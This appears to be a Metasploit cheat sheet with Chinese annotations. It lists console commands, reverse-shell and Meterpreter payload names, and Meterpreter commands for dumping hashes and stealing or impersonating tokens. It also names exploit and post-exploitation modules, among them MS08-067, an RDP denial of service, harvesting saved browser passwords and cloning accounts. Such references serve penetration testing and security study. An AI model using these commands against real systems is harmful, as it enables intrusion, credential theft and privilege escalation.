(1) Metasploit Command(help:-h)

  1. msfconsolemsfpayloadmsfvenommsfencodemsfupdatedb_connectdb_statusdb_rebuild_cachedb_exportdb_importhelpclearexitquit
  2. searchusesetsetgshowthreadsrunexploitrexploitsessionsroute
  3. hostsservicesvulnslootnotescredsresource
  4. [...SNIP...]

(2) Msfpayload Lists(help:-h |lists:-l)

  1. Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]|s[O]>
  2. windows/shell_reverse_tcp
  3. windows/meterpreter/bind_tcp
  4. windows/meterpreter/reverse_tcp
  5. windows/x64/meterpreter/bind_tcp
  6. windows/x64/meterpreter/reverse_tcp
  7. linux/x86/shell_reverse_tcp
  8. linux/x86/meterpreter/reverse_tcp
  9. [...SNIP...]

(3) Meterpreter Command(help:-h)

  1. useloadgetuidgetsystemhashdumppsshellmigratebackgroundrun
  2. execute -H -f D:\\temp\\tmp\\Cookies\\csc.exe -a '/c whoami'
  3. use incognito //加载incognito功能(用来盗窃目标主机的令牌或假冒用户)
  4. list_tokens -u //列出目标主机用户的可用令牌。
  5. list_tokens -g //列出目标主机用户组的可用令牌。
  6. impersonate_token DOMAIN_NAME\\USERNAME //假冒目标主机上的可用令牌。
  7. steal_token PID //盗窃给定进程的可用令牌并进行令牌假冒。
  8. drop_token //停止假冒当前令牌。
  9. rev2self //在远程机器上调用了RevertToSelf()
  10. [...SNIP...]

(4) Metasploit Module(show option)

  1. exploit/multi/handler //接收攻击载荷的句柄
  2. exploit/windows/smb/smb_login
  3. exploit/windows/smb/psexec
  4. exploit/windows/smb/ms08_067_netapi //MS08_067
  5. exploit/windows/browser/ms12_004_midi //MS12_004
  6. exploit/windows/local/ms_ndproxy //MS14_002
  7. exploit/windows/local/ms14_058_track_popup_menu //MS14_058
  8. auxiliary/dos/windows/rdp/ms12_020_maxchannelids //MS12_020(RDP蓝屏)
  9. exploit/windows/browser/adobe_flash_pixel_bender_bof
  10. post/multi/gather/lastpass_creds //获取主机浏览器保存的密码
  11. post/windows/manage/enable_support_account //克隆系统用户
  12. auxiliary/admin/mssql/mssql_esclate_dbowner
  13. post/windows/gather/smart_hashdump

参考资料

  1. exploit/windows/mysql/mysql_payload
  2. http://eromang.zataz.com/2011/03/10/oracle-mysql-udf-for-microsoft-windows-metasploit-payload-execution/
  3. Hack ALL Security Features in Remote Windows 7 PC
  4. http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc

public.png